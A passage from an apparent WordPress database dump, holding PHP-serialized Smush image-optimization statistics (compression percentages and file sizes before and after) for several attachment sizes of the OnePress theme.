s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.25;s:5:\"bytes\";i:12294;s:11:\"size_before\";i:40638;s:10:\"size_after\";i:28344;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:31337;s:11:\"size_before\";i:105274;s:10:\"size_after\";i:73937;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:43248;s:11:\"size_before\";i:168078;s:10:\"size_after\";i:124830;s:4:\"time\";d:0.56999999999999995115018691649311222136020660400390625;}}}'),(4296,2197,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.37935918539218338452201351174153387546539306640625;s:5:\"bytes\";i:5621;s:11:\"size_before\";i:104492;s:10:\"size_after\";i:98871;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.29000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:115;s:11:\"size_before\";i:3497;s:10:\"size_after\";i:3382;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:204;s:11:\"size_before\";i:4722;s:10:\"size_after\";i:4518;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.61000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:1080;s:11:\"size_before\";i:19258;s:10:\"size_after\";i:18178;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:2058;s:11:\"size_before\";i:30211;s:10:\"size_after\";i:28153;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.569999999999999840127884453977458178997039794921875;s:5:\"bytes\";i:232;s:11:\"size_before\";i:6500;s:10:\"size_after\";i:6268;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.45000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:707;s:11:\"size_before\";i:15899;s:10:\"size_after\";i:15192;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1225;s:11:\"size_before\";i:24405;s:10:\"size_after\";i:23180;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4297,2196,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.30290154442220629249504781910218298435211181640625;s:5:\"bytes\";i:6172;s:11:\"size_before\";i:186866;s:10:\"size_after\";i:180694;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:201;s:11:\"size_before\";i:5247;s:10:\"size_after\";i:5046;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:450;s:11:\"size_before\";i:9027;s:10:\"size_after\";i:8577;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.560000000000000053290705182007513940334320068359375;s:5:\"bytes\";i:1360;s:11:\"size_before\";i:38182;s:10:\"size_after\";i:36822;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:3;s:5:\"bytes\";i:1796;s:11:\"size_before\";i:59790;s:10:\"size_after\";i:57994;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:446;s:11:\"size_before\";i:11087;s:10:\"size_after\";i:10641;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.37999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:851;s:11:\"size_before\";i:25192;s:10:\"size_after\";i:24341;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.79000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1068;s:11:\"size_before\";i:38341;s:10:\"size_after\";i:37273;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4298,2195,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.50104736376312342116534637170843780040740966796875;s:5:\"bytes\";i:8640;s:11:\"size_before\";i:157061;s:10:\"size_after\";i:148421;s:4:\"time\";d:0.169999999999999984456877655247808434069156646728515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.70999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:267;s:11:\"size_before\";i:5671;s:10:\"size_after\";i:5404;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:326;s:11:\"size_before\";i:6131;s:10:\"size_after\";i:5805;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1723;s:11:\"size_before\";i:28632;s:10:\"size_after\";i:26909;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.25;s:5:\"bytes\";i:2891;s:11:\"size_before\";i:46288;s:10:\"size_after\";i:43397;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.96999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:459;s:11:\"size_before\";i:9244;s:10:\"size_after\";i:8785;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:1129;s:11:\"size_before\";i:23495;s:10:\"size_after\";i:22366;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1845;s:11:\"size_before\";i:37600;s:10:\"size_after\";i:35755;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4299,2192,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.14646135528041259732390244607813656330108642578125;s:5:\"bytes\";i:6397;s:11:\"size_before\";i:124299;s:10:\"size_after\";i:117902;s:4:\"time\";d:0.06999999999999999278355033993648248724639415740966796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:542;s:11:\"size_before\";i:7375;s:10:\"size_after\";i:6833;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:536;s:11:\"size_before\";i:9006;s:10:\"size_after\";i:8470;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.86000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:1703;s:11:\"size_before\";i:35062;s:10:\"size_after\";i:33359;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:674;s:11:\"size_before\";i:12236;s:10:\"size_after\";i:11562;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.21999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1381;s:11:\"size_before\";i:26470;s:10:\"size_after\";i:25089;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1561;s:11:\"size_before\";i:34150;s:10:\"size_after\";i:32589;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4300,2191,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.32130880776220660521858007996343076229095458984375;s:5:\"bytes\";i:6998;s:11:\"size_before\";i:131509;s:10:\"size_after\";i:124511;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:239;s:11:\"size_before\";i:4973;s:10:\"size_after\";i:4734;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.79000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:505;s:11:\"size_before\";i:8716;s:10:\"size_after\";i:8211;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2058;s:11:\"size_before\";i:38601;s:10:\"size_after\";i:36543;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.44000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:623;s:11:\"size_before\";i:11454;s:10:\"size_after\";i:10831;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.86000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:1328;s:11:\"size_before\";i:27301;s:10:\"size_after\";i:25973;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:2245;s:11:\"size_before\";i:40464;s:10:\"size_after\";i:38219;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4301,2177,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.8413603090138028761657551513053476810455322265625;s:5:\"bytes\";i:4754;s:11:\"size_before\";i:37021;s:10:\"size_after\";i:32267;s:4:\"time\";d:0.12000000000000000943689570931383059360086917877197265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1610;s:11:\"size_before\";i:17563;s:10:\"size_after\";i:15953;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3144;s:11:\"size_before\";i:19458;s:10:\"size_after\";i:16314;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}}}'),(4302,2167,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.2134370037781305740054449415765702724456787109375;s:5:\"bytes\";i:7695;s:11:\"size_before\";i:182630;s:10:\"size_after\";i:174935;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:509;s:11:\"size_before\";i:7991;s:10:\"size_after\";i:7482;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:784;s:11:\"size_before\";i:13691;s:10:\"size_after\";i:12907;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.45999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2000;s:11:\"size_before\";i:57826;s:10:\"size_after\";i:55826;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:733;s:11:\"size_before\";i:13776;s:10:\"size_after\";i:13043;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1498;s:11:\"size_before\";i:34544;s:10:\"size_after\";i:33046;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2171;s:11:\"size_before\";i:54802;s:10:\"size_after\";i:52631;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4303,2166,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.1674265037575946024617223883979022502899169921875;s:5:\"bytes\";i:4342;s:11:\"size_before\";i:104189;s:10:\"size_after\";i:99847;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:427;s:11:\"size_before\";i:7454;s:10:\"size_after\";i:7027;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.88999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:653;s:11:\"size_before\";i:13367;s:10:\"size_after\";i:12714;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:629;s:11:\"size_before\";i:12490;s:10:\"size_after\";i:11861;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.70000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1080;s:11:\"size_before\";i:29175;s:10:\"size_after\";i:28095;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.720000000000000195399252334027551114559173583984375;s:5:\"bytes\";i:1553;s:11:\"size_before\";i:41703;s:10:\"size_after\";i:40150;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4304,2165,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.2781664232294058791694624233059585094451904296875;s:5:\"bytes\";i:2985;s:11:\"size_before\";i:91057;s:10:\"size_after\";i:88072;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:282;s:11:\"size_before\";i:5722;s:10:\"size_after\";i:5440;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:438;s:11:\"size_before\";i:10732;s:10:\"size_after\";i:10294;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.53000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:439;s:11:\"size_before\";i:9687;s:10:\"size_after\";i:9248;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.069999999999999840127884453977458178997039794921875;s:5:\"bytes\";i:784;s:11:\"size_before\";i:25536;s:10:\"size_after\";i:24752;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.649999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:1042;s:11:\"size_before\";i:39380;s:10:\"size_after\";i:38338;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4305,2127,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.998561358077974858815650804899632930755615234375;s:5:\"bytes\";i:695;s:11:\"size_before\";i:6951;s:10:\"size_after\";i:6256;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:10;s:5:\"bytes\";i:695;s:11:\"size_before\";i:6951;s:10:\"size_after\";i:6256;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4306,2126,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.7725623023159460256437114367145113646984100341796875;s:5:\"bytes\";i:7829;s:11:\"size_before\";i:441677;s:10:\"size_after\";i:433848;s:4:\"time\";d:1.45999999999999996447286321199499070644378662109375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:916;s:11:\"size_before\";i:11262;s:10:\"size_after\";i:10346;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:7;s:5:\"bytes\";i:1608;s:11:\"size_before\";i:22960;s:10:\"size_after\";i:21352;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.4299999999999999378275106209912337362766265869140625;s:5:\"bytes\";i:1486;s:11:\"size_before\";i:104238;s:10:\"size_after\";i:102752;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:163605;s:10:\"size_after\";i:163605;s:4:\"time\";d:0.5;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1230;s:11:\"size_before\";i:21021;s:10:\"size_after\";i:19791;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.970000000000000195399252334027551114559173583984375;s:5:\"bytes\";i:1367;s:11:\"size_before\";i:46017;s:10:\"size_after\";i:44650;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.6799999999999999378275106209912337362766265869140625;s:5:\"bytes\";i:1222;s:11:\"size_before\";i:72574;s:10:\"size_after\";i:71352;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4307,2086,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.300442122186492355240261531434953212738037109375;s:5:\"bytes\";i:6031;s:11:\"size_before\";i:19904;s:10:\"size_after\";i:13873;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1116;s:11:\"size_before\";i:2703;s:10:\"size_after\";i:1587;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2588;s:11:\"size_before\";i:11888;s:10:\"size_after\";i:9300;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:43.7999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2327;s:11:\"size_before\";i:5313;s:10:\"size_after\";i:2986;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4308,2080,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:433089;s:10:\"size_after\";i:433089;s:4:\"time\";d:0.87000000000000010658141036401502788066864013671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:26099;s:10:\"size_after\";i:26099;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:65543;s:10:\"size_after\";i:65543;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:48845;s:10:\"size_after\";i:48845;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:129874;s:10:\"size_after\";i:129874;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:162728;s:10:\"size_after\";i:162728;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}}}'),(4309,2052,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.66186936580736954738313215784728527069091796875;s:5:\"bytes\";i:1074;s:11:\"size_before\";i:18969;s:10:\"size_after\";i:17895;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.20999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:505;s:11:\"size_before\";i:8137;s:10:\"size_after\";i:7632;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.25;s:5:\"bytes\";i:569;s:11:\"size_before\";i:10832;s:10:\"size_after\";i:10263;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4310,2051,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.765032377428307430733411820256151258945465087890625;s:5:\"bytes\";i:407;s:11:\"size_before\";i:10810;s:10:\"size_after\";i:10403;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:231;s:11:\"size_before\";i:4933;s:10:\"size_after\";i:4702;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:176;s:11:\"size_before\";i:5877;s:10:\"size_after\";i:5701;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4311,2050,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.59519531851547657907985922065563499927520751953125;s:5:\"bytes\";i:1090;s:11:\"size_before\";i:19481;s:10:\"size_after\";i:18391;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.45999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:515;s:11:\"size_before\";i:7977;s:10:\"size_after\";i:7462;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:5;s:5:\"bytes\";i:575;s:11:\"size_before\";i:11504;s:10:\"size_after\";i:10929;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4312,2049,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.4522168689394394647251829155720770359039306640625;s:5:\"bytes\";i:894;s:11:\"size_before\";i:16397;s:10:\"size_after\";i:15503;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:406;s:11:\"size_before\";i:6822;s:10:\"size_after\";i:6416;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:488;s:11:\"size_before\";i:9575;s:10:\"size_after\";i:9087;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4313,2018,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.1341856130771557076286626397632062435150146484375;s:5:\"bytes\";i:12517;s:11:\"size_before\";i:175451;s:10:\"size_after\";i:162934;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:322;s:11:\"size_before\";i:5237;s:10:\"size_after\";i:4915;s:4: